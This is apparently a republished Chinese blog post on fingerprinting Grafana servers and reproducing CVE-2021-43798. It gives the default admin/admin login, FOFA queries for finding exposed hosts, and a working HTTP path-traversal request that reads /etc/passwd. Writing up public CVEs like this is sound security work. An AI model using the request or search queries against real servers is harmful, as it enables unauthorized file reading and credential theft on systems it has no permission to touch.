Grafana监控平台特征及漏洞复现

news/2025/12/2 12:58:25/文章来源:https://www.cnblogs.com/priv/p/19297087

Grafana是一个开源的度量分析与可视化套件。

Web特征

其默认页面位于3000端口,访问后默认是登录验证界面:

image-20251122212614361

页面下方会显示当前版本,比如上图中的:v8.2.6 (c3cc4da7a5)

该产品存在标签页默认icon图标:image-20251122212807198

存在默认账户:admin/admin

fofa语法:app="Grafana"app="Grafana" && port="3000"(host="grafana" || domain="grafana") && port="3000"app="Grafana" && body="v8.2.6"

漏洞复现

CVE-2021-43798(插件模块目录穿越)

此漏洞可以读取服务器上的任意文件。

fofa语法:app="Grafana" && body="v8.2.6"

影响范围:

  • 8.0.x 系列:8.0.0-beta1 ≤ Grafana < 8.0.7
  • 8.1.x 系列:8.1.0 ≤ Grafana < 8.1.8
  • 8.2.x 系列:8.2.0 ≤ Grafana < 8.2.7
  • 8.3.x 系列:8.3.0

复现示例

这个漏洞出现在插件模块中,该模块支持用户访问插件目录下的文件,但因为没有对文件名进行限制,可以通过../的方式穿越目录,读取到服务器上的任意文件。

利用此漏洞需要先获取一个已安装的插件id,可以从以下常见的id中选取尝试:

alertlist
cloudwatch
dashlist
elasticsearch
graph
graphite
heatmap
influxdb
mysql
opentsdb
pluginlist
postgres
prometheus
stackdriver
table
text

再发送如下数据包,读取任意文件(这里使用的插件id为alertlist):

GET /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.1.112:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

成功读取密码文件:

image-20251122214043403

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/984140.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

SSM工商行政许可信息爬取及展示专业的系统es06d(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。

SSM工商行政许可信息爬取及展示专业的系统es06d(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。2025-12-02 12:54 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-spa…

2025年十大资质齐全的地磅厂家排行榜,优质生产商及来样定制

为帮助企业精准锁定适配工业称重需求的地磅合作伙伴,避免因产品精度差、定制能力不足导致的生产效率损耗,我们从资质合规性(如高新技术企业认证、ISO体系认证)、产品核心性能(精度稳定性、耐腐蚀性)、定制服务能…

喷塑企业靠不靠谱?常州思尔利实力强

本榜单聚焦常州、镇江、苏州、无锡、南京苏南核心区域,结合厂房规模、设备配置、团队专业度、交付效率及客户口碑五大维度,筛选出十家标杆喷塑加工企业,为制造类企业选型提供客观依据,助力精准匹配适配的加工伙伴。…

大华摄像头系统特征及漏洞探测利用

Web特征 常见icon: fofa语法:app="Dahua-视频监控" && country="CN" 通过80/49152/554/443等端口即可访问默认页面:页面中的特征:title一般是:WEB SERVICE 响应/请求体中cookie包含:…

大华DSS系统特征及漏洞探测利用

Web特征 常见的icon图标: fofa语法:app="dahua-DSS"、icon_hash="411052691"、icon_hash="2095320044"、body="/portal/include/script/dahuaDefined/headCommon.js" &…

畅捷通系统特征及漏洞探测利用

Web特征 常见icon: fofa语法:app="畅捷通-TPlus"、app="畅捷通-好会计"、app="畅捷通-好业财"、app="畅捷通-T1"、host="/tplus/"、path="/tplus/UploadHan…

海康威视iVMS系统特征及漏洞探测利用

海康威视 IVMS(Intelligent Video Management System,智能视频管理系统)是一套集视频监控、设备管理、智能分析及多系统融合于一体的综合管理平台,旨在为企业、机构和家庭提供高效、智能的安防解决方案。 Web特征 …

海康威视摄像头系统特征及漏洞探测利用

Web特征 常见icon/logo: fofa语法:app="HIKVISION-视频监控" && country="CN"、(app="HIKVISION-视频监控" || body="Hikvision" ) && country="CN&q…

帆软报表FineReport系统特征及漏洞探测利用

Web特征 通过80/443端口即可访问默认页面:其他相关Web特征:类型 路径&详情URL路径特征 /WebReport/ReportServer、/ReportServer、/report/ReportServer报表模板访问 包含cmd=fs_signin、op=fs_load等参数版本信…

泛微OA系统特征及漏洞探测利用

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。 Web特征 相关图…

瑞友天翼系统特征及漏洞探测利用

Web特征 常见icon图标/logo: fofa语法:app="REALOR-天翼应用虚拟化系统"、title="瑞友天翼-应用虚拟化系统"、title="瑞友天翼-应用虚拟化系统" || title="瑞友应用虚拟化系统…

金和OA系统特征及漏洞探测利用

Web特征 默认icon图标: fofa语法:app="金和网络-金和OA"、(app="金和网络-金和OA" || body="/c6") && (body="金和" || body="JHSoft") URL 路径特征:系…

2025年河北公职考试培训优质品牌推荐:仕登科全阶段备考服务 高校合作保障,助力考生稳上岸!

当前,公务员、事业单位、军队文职等公职类考试竞争愈发激烈,据相关数据显示,每年参与公职考试的考生数量呈逐年递增趋势,超七成考生在备考过程中面临资源匮乏、教学质量参差不齐、备考心态焦虑以及学习环境不稳定等…

若依OA系统特征及漏洞探测利用

若依 (RuoYi) 是一款流行的 Java 开源后台管理系统,广泛应用于 OA、CMS 等场景。 Web特征 常见icon/logo: fofa语法:app="若依-管理系统" 通过80/443/8080等端口即可访问默认页面:Web页面中的特征:titl…

随机动量梯度法的末点收敛性分析

本文研究了用于求解机器学习中有限和优化问题的随机动量梯度方法。在非凸目标函数及任意数据混洗策略下,论文从理论上证明了迭代序列的末点梯度范数收敛性,并进一步在KL不等式条件下建立了更强的极限点收敛结果。随机…

海康威视综合安防管理平台特征及漏洞探测利用

海康威视 iSecure Center (ISC) 是一款综合安防管理平台,用于视频监控、门禁、停车场等系统的集中管理。其 web 界面是信息搜集和资产识别的主要入口。 Web特征 常见icon/logo: fofa语法:app="HIKVISION-iSecu…

通达OA系统特征及漏洞探测利用

Web特征 存在一些icon、logo: fofa语法:app="TDXK-通达OA"、title="通达OA" || title="Office Anywhere" 网页title默认是“通达 OA” 或 “Office Anywhere”,也可能被自定义修改,…

蓝凌OA系统特征及漏洞探测利用

Web特征 默认icon图标: fofa:app="Landray-OA系统"、title="智慧协同平台"、icon_hash="831854882" 访问后默认是login登录界面:web网页目录结构特征:默认页面存在一些特征:title:…

2025年优质供应链云平台TOP10,实现全链路数字化!财务云/供应链云/易代账/用友 T3/协同云/制造云/好业财供应链云产品选哪家

供应链云平台市场格局分析 随着数字化转型的深入推进,供应链云管理系统已成为企业提升运营效率、优化资源配置的重要工具。据权威调研机构数据显示,2024年中国供应链云服务市场规模突破300亿元,年复合增长率达25.6%…

git项目管理idea

使用git对软件开发项目进行代码管理 (1)获取git账户、项目git地址、代码分支 (2)在idea下载git项目,选择对应代码分支